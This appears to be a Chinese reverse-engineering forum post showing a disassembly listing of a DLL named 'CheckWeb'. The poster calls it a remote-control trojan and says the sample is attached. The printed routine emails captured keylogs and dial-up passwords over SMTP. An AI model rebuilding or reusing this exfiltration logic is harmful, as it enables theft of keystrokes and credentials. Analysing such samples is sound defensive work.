10001A22 |. 6A 00 PUSH 0 ; /Flags = 0
10001A24 |. 6A 02 PUSH 2 ; |DataSize = 2
10001A26 |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
10001A2B |. 53 PUSH EBX ; |Socket
10001A2C |. E8 63090000 CALL <JMP.&WSOCK32.#19> ; \send
10001A31 |. 85C0 TEST EAX,EAX
10001A33 |. 0F8E AA020000 JLE CheckWeb.10001CE3
10001A39 |. B9 19000000 MOV ECX,19
10001A3E |. 33C0 XOR EAX,EAX
10001A40 |. 8DBC24 0C0100>LEA EDI,DWORD PTR SS:[ESP+10C]
10001A47 |. F3:AB REP STOS DWORD PTR ES:[EDI]
10001A49 |. 8D4424 20 LEA EAX,DWORD PTR SS:[ESP+20]
10001A4D |. 8D8C24 0C0100>LEA ECX,DWORD PTR SS:[ESP+10C]
10001A54 |. 50 PUSH EAX
10001A55 |. 68 B8900010 PUSH CheckWeb.100090B8 ; ASCII "Subject: %s
"
10001A5A |. 51 PUSH ECX
10001A5B |. E8 380B0000 CALL CheckWeb.10002598
10001A60 |. 8DBC24 180100>LEA EDI,DWORD PTR SS:[ESP+118]
10001A67 |. 83C9 FF OR ECX,FFFFFFFF
10001A6A |. 33C0 XOR EAX,EAX
10001A6C |. 83C4 0C ADD ESP,0C
10001A6F |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
10001A71 |. F7D1 NOT ECX
10001A73 |. 49 DEC ECX
10001A74 |. 6A 00 PUSH 0 ; /Flags = 0
10001A76 |. 8D9424 100100>LEA EDX,DWORD PTR SS:[ESP+110] ; |
10001A7D |. 51 PUSH ECX ; |DataSize
10001A7E |. 52 PUSH EDX ; |Data
10001A7F |. 53 PUSH EBX ; |Socket
10001A80 |. E8 0F090000 CALL <JMP.&WSOCK32.#19> ; \send
10001A85 |. 85C0 TEST EAX,EAX
10001A87 |. 0F8E 56020000 JLE CheckWeb.10001CE3
10001A8D |. 6A 00 PUSH 0 ; /Flags = 0
10001A8F |. 6A 02 PUSH 2 ; |DataSize = 2
10001A91 |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
10001A96 |. 53 PUSH EBX ; |Socket
10001A97 |. E8 F8080000 CALL <JMP.&WSOCK32.#19> ; \send
10001A9C |. 85C0 TEST EAX,EAX
10001A9E |. 0F8E 3F020000 JLE CheckWeb.10001CE3
10001AA4 |. 8D7C24 64 LEA EDI,DWORD PTR SS:[ESP+64]
10001AA8 |. 83C9 FF OR ECX,FFFFFFFF
10001AAB |. 33C0 XOR EAX,EAX
10001AAD |. 6A 00 PUSH 0 ; /Flags = 0
10001AAF |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
10001AB1 |. F7D1 NOT ECX ; |
10001AB3 |. 49 DEC ECX ; |
10001AB4 |. 8D4424 68 LEA EAX,DWORD PTR SS:[ESP+68] ; |
10001AB8 |. 51 PUSH ECX ; |DataSize
10001AB9 |. 50 PUSH EAX ; |Data
10001ABA |. 53 PUSH EBX ; |Socket
10001ABB |. E8 D4080000 CALL <JMP.&WSOCK32.#19> ; \send
10001AC0 |. 85C0 TEST EAX,EAX
10001AC2 |. 0F8E 1B020000 JLE CheckWeb.10001CE3
10001AC8 |. 6A 00 PUSH 0 ; /Flags = 0
10001ACA |. 6A 01 PUSH 1 ; |DataSize = 1
10001ACC |. 68 B4900010 PUSH CheckWeb.100090B4 ; |Data = CheckWeb.100090B4
10001AD1 |. 53 PUSH EBX ; |Socket
10001AD2 |. E8 BD080000 CALL <JMP.&WSOCK32.#19> ; \send
10001AD7 |. 85C0 TEST EAX,EAX
10001AD9 |. 0F8E 04020000 JLE CheckWeb.10001CE3
10001ADF |. 8D7C24 20 LEA EDI,DWORD PTR SS:[ESP+20]
10001AE3 |. 83C9 FF OR ECX,FFFFFFFF
10001AE6 |. 33C0 XOR EAX,EAX
10001AE8 |. 6A 00 PUSH 0 ; /Flags = 0
10001AEA |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
10001AEC |. F7D1 NOT ECX ; |
10001AEE |. 49 DEC ECX ; |
10001AEF |. 51 PUSH ECX ; |DataSize
10001AF0 |. 8D4C24 28 LEA ECX,DWORD PTR SS:[ESP+28] ; |
10001AF4 |. 51 PUSH ECX ; |Data
10001AF5 |. 53 PUSH EBX ; |Socket
10001AF6 |. E8 99080000 CALL <JMP.&WSOCK32.#19> ; \send
10001AFB |. 85C0 TEST EAX,EAX
10001AFD |. 0F8E E0010000 JLE CheckWeb.10001CE3
10001B03 |. 6A 00 PUSH 0 ; /Flags = 0
10001B05 |. 6A 02 PUSH 2 ; |DataSize = 2
10001B07 |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
10001B0C |. 53 PUSH EBX ; |Socket
10001B0D |. E8 82080000 CALL <JMP.&WSOCK32.#19> ; \send
10001B12 |. 85C0 TEST EAX,EAX
10001B14 |. 0F8E C9010000 JLE CheckWeb.10001CE3
10001B1A |. BF 18AE0010 MOV EDI,CheckWeb.1000AE18
10001B1F |. 83C9 FF OR ECX,FFFFFFFF
10001B22 |. 33C0 XOR EAX,EAX
10001B24 |. 6A 00 PUSH 0 ; /Flags = 0
10001B26 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
10001B28 |. F7D1 NOT ECX ; |
10001B2A |. 49 DEC ECX ; |
10001B2B |. 51 PUSH ECX ; |DataSize
10001B2C |. 68 18AE0010 PUSH CheckWeb.1000AE18 ; |Data = CheckWeb.1000AE18
10001B31 |. 53 PUSH EBX ; |Socket
10001B32 |. E8 5D080000 CALL <JMP.&WSOCK32.#19> ; \send
10001B37 |. 85C0 TEST EAX,EAX
10001B39 |. 0F8E A4010000 JLE CheckWeb.10001CE3
10001B3F |. 6A 00 PUSH 0 ; /Flags = 0
10001B41 |. 6A 02 PUSH 2 ; |DataSize = 2
10001B43 |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
10001B48 |. 53 PUSH EBX ; |Socket
10001B49 |. E8 46080000 CALL <JMP.&WSOCK32.#19> ; \send
10001B4E |. 85C0 TEST EAX,EAX
10001B50 |. 0F8E 8D010000 JLE CheckWeb.10001CE3
10001B56 |. E8 55060000 CALL CheckWeb.100021B0
10001B5B |. BF 80AE0010 MOV EDI,CheckWeb.1000AE80
10001B60 |. 83C9 FF OR ECX,FFFFFFFF
10001B63 |. 33C0 XOR EAX,EAX
10001B65 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
10001B67 |. F7D1 NOT ECX
10001B69 |. 49 DEC ECX
10001B6A |. 83F9 02 CMP ECX,2
10001B6D |. 73 23 JNB SHORT CheckWeb.10001B92
10001B6F |. BF A4900010 MOV EDI,CheckWeb.100090A4 ; ASCII "not key log!!!"
10001B74 |. 83C9 FF OR ECX,FFFFFFFF
10001B77 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
10001B79 |. F7D1 NOT ECX
10001B7B |. 2BF9 SUB EDI,ECX
10001B7D |. 8BD1 MOV EDX,ECX
10001B7F |. 8BF7 MOV ESI,EDI
10001B81 |. BF 80AE0010 MOV EDI,CheckWeb.1000AE80
10001B86 |. C1E9 02 SHR ECX,2
10001B89 |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
10001B8B |. 8BCA MOV ECX,EDX
10001B8D |. 83E1 03 AND ECX,3
10001B90 |. F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
10001B92 |> BF 80AE0010 MOV EDI,CheckWeb.1000AE80
10001B97 |. 83C9 FF OR ECX,FFFFFFFF
10001B9A |. 33C0 XOR EAX,EAX
10001B9C |. 6A 00 PUSH 0 ; /Flags = 0
10001B9E |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
10001BA0 |. F7D1 NOT ECX ; |
10001BA2 |. 49 DEC ECX ; |
10001BA3 |. 51 PUSH ECX ; |DataSize
10001BA4 |. 68 80AE0010 PUSH CheckWeb.1000AE80 ; |Data = CheckWeb.1000AE80
10001BA9 |. 53 PUSH EBX ; |Socket
10001BAA |. E8 E5070000 CALL <JMP.&WSOCK32.#19> ; \send
10001BAF |. 85C0 TEST EAX,EAX
10001BB1 |. 0F8E 2C010000 JLE CheckWeb.10001CE3
10001BB7 |. 6A 00 PUSH 0 ; /Flags = 0
10001BB9 |. 6A 02 PUSH 2 ; |DataSize = 2
10001BBB |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
10001BC0 |. 53 PUSH EBX ; |Socket
10001BC1 |. E8 CE070000 CALL <JMP.&WSOCK32.#19> ; \send
10001BC6 |. 85C0 TEST EAX,EAX
10001BC8 |. 0F8E 15010000 JLE CheckWeb.10001CE3
10001BCE |. E8 2DF4FFFF CALL CheckWeb.10001000
10001BD3 |. BF 189E0010 MOV EDI,CheckWeb.10009E18
10001BD8 |. 83C9 FF OR ECX,FFFFFFFF
10001BDB |. 33C0 XOR EAX,EAX
10001BDD |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
10001BDF |. F7D1 NOT ECX
10001BE1 |. 49 DEC ECX
10001BE2 |. 83F9 02 CMP ECX,2
10001BE5 |. 73 23 JNB SHORT CheckWeb.10001C0A
10001BE7 |. BF 90900010 MOV EDI,CheckWeb.10009090 ; ASCII "not x dial pass!!!"
10001BEC |. 83C9 FF OR ECX,FFFFFFFF
10001BEF |. F2:AE REPNE SCAS BYTE PTR ES:[EDI]
10001BF1 |. F7D1 NOT ECX
10001BF3 |. 2BF9 SUB EDI,ECX
10001BF5 |. 8BC1 MOV EAX,ECX
10001BF7 |. 8BF7 MOV ESI,EDI
10001BF9 |. BF 189E0010 MOV EDI,CheckWeb.10009E18
10001BFE |. C1E9 02 SHR ECX,2
10001C01 |. F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
10001C03 |. 8BC8 MOV ECX,EAX
10001C05 |. 83E1 03 AND ECX,3
10001C08 |. F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[>
10001C0A |> BF 189E0010 MOV EDI,CheckWeb.10009E18
10001C0F |. 83C9 FF OR ECX,FFFFFFFF
10001C12 |. 33C0 XOR EAX,EAX
10001C14 |. 6A 00 PUSH 0 ; /Flags = 0
10001C16 |. F2:AE REPNE SCAS BYTE PTR ES:[EDI] ; |
10001C18 |. F7D1 NOT ECX ; |
10001C1A |. 49 DEC ECX ; |
10001C1B |. 51 PUSH ECX ; |DataSize
10001C1C |. 68 189E0010 PUSH CheckWeb.10009E18 ; |Data = CheckWeb.10009E18
10001C21 |. 53 PUSH EBX ; |Socket
10001C22 |. E8 6D070000 CALL <JMP.&WSOCK32.#19> ; \send
10001C27 |. 85C0 TEST EAX,EAX
10001C29 |. 0F8E B4000000 JLE CheckWeb.10001CE3
10001C2F |. 6A 00 PUSH 0 ; /Flags = 0
10001C31 |. 6A 02 PUSH 2 ; |DataSize = 2
10001C33 |. 68 14910010 PUSH CheckWeb.10009114 ; |Data = CheckWeb.10009114
10001C38 |. 53 PUSH EBX ; |Socket
10001C39 |. E8 56070000 CALL <JMP.&WSOCK32.#19> ; \send
10001C3E |. 85C0 TEST EAX,EAX
10001C40 |. 0F8E 9D000000 JLE CheckWeb.10001CE3
10001C46 |. 6A 00 PUSH 0 ; /Flags = 0
10001C48 |. 6A 04 PUSH 4 ; |DataSize = 4
10001C4A |. 68 88900010 PUSH CheckWeb.10009088 ; |Data = CheckWeb.10009088
10001C4F |. 53 PUSH EBX ; |Socket
10001C50 |. E8 3F070000 CALL <JMP.&WSOCK32.#19> ; \send
10001C55 |. 85C0 TEST EAX,EAX
10001C57 |. 0F8E 86000000 JLE CheckWeb.10001CE3
10001C5D |. 6A 00 PUSH 0 ; /Flags = 0
10001C5F |. 6A 05 PUSH 5 ; |DataSize = 5
10001C61 |. 68 80900010 PUSH CheckWeb.10009080 ; |Data = CheckWeb.10009080
10001C66 |. 53 PUSH EBX ; |Socket
10001C67 |. E8 28070000 CALL <JMP.&WSOCK32.#19> ; \send
10001C6C |. 85C0 TEST EAX,EAX
10001C6E |. 7E 73 JLE SHORT CheckWeb.10001CE3
10001C70 |. 6A 00 PUSH 0 ; /Flags = 0
10001C72 |. 8D8C24 D80100>LEA ECX,DWORD PTR SS:[ESP+1D8] ; |
10001C79 |. 68 00040000 PUSH 400 ; |BufSize = 400 (1024.)
10001C7E |. 51 PUSH ECX ; |Buffer
10001C7F |. 53 PUSH EBX ; |Socket
10001C80 |. E8 15070000 CALL <JMP.&WSOCK32.#16> ; \recv
10001C85 |. 85C0 TEST EAX,EAX
10001C87 |. 7E 5A JLE SHORT CheckWeb.10001CE3
10001C89 |. 8D9424 D40100>LEA EDX,DWORD PTR SS:[ESP+1D4]
10001C90 |. 68 10910010 PUSH CheckWeb.10009110 ; ASCII "250"
10001C95 |. 52 PUSH EDX
10001C96 |. E8 55090000 CALL CheckWeb.100025F0
10001C9B |. 83C4 08 ADD ESP,8
10001C9E |. 85C0 TEST EAX,EAX
10001CA0 |. 74 41 JE SHORT CheckWeb.10001CE3
10001CA2 |. 6A 00 PUSH 0 ; /Flags = 0
10001CA4 |. 6A 06 PUSH 6 ; |DataSize = 6
10001CA6 |. 68 78900010 PUSH CheckWeb.10009078 ; |Data = CheckWeb.10009078
10001CAB |. 53 PUSH EBX ; |Socket
10001CAC |. E8 E3060000 CALL <JMP.&WSOCK32.#19> ; \send
10001CB1 |. 85C0 TEST EAX,EAX
10001CB3 |. 7E 2E JLE SHORT CheckWeb.10001CE3
10001CB5 |. 6A 00 PUSH 0 ; /Flags = 0
10001CB7 |. 8D8424 D80100>LEA EAX,DWORD PTR SS:[ESP+1D8] ; |
10001CBE |. 68 00040000 PUSH 400 ; |BufSize = 400 (1024.)
10001CC3 |. 50 PUSH EAX ; |Buffer
10001CC4 |. 53 PUSH EBX ; |Socket
10001CC5 |. E8 D0060000 CALL <JMP.&WSOCK32.#16> ; \recv
10001CCA |. 85C0 TEST EAX,EAX
10001CCC |. 7E 15 JLE SHORT CheckWeb.10001CE3
10001CCE |. 8D8C24 D40100>LEA ECX,DWORD PTR SS:[ESP+1D4]
10001CD5 |. 68 74900010 PUSH CheckWeb.10009074 ; ASCII "221"
10001CDA |. 51 PUSH ECX
10001CDB |. E8 10090000 CALL CheckWeb.100025F0
10001CE0 |. 83C4 08 ADD ESP,8
10001CE3 |> 53 PUSH EBX ; /Socket
10001CE4 |. E8 A5060000 CALL <JMP.&WSOCK32.#3> ; \closesocket
10001CE9 |. E8 9A060000 CALL <JMP.&WSOCK32.#116> ; [WSACleanup
10001CEE |. 5F POP EDI
10001CEF |. 5E POP ESI
10001CF0 |. 33C0 XOR EAX,EAX
10001CF2 |. 5B POP EBX
10001CF3 |. 81C4 5C070000 ADD ESP,75C
10001CF9 \. C3 RETN
还有写也懒的写了 大概就是个远控之类的东西
我把程序传附件里
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)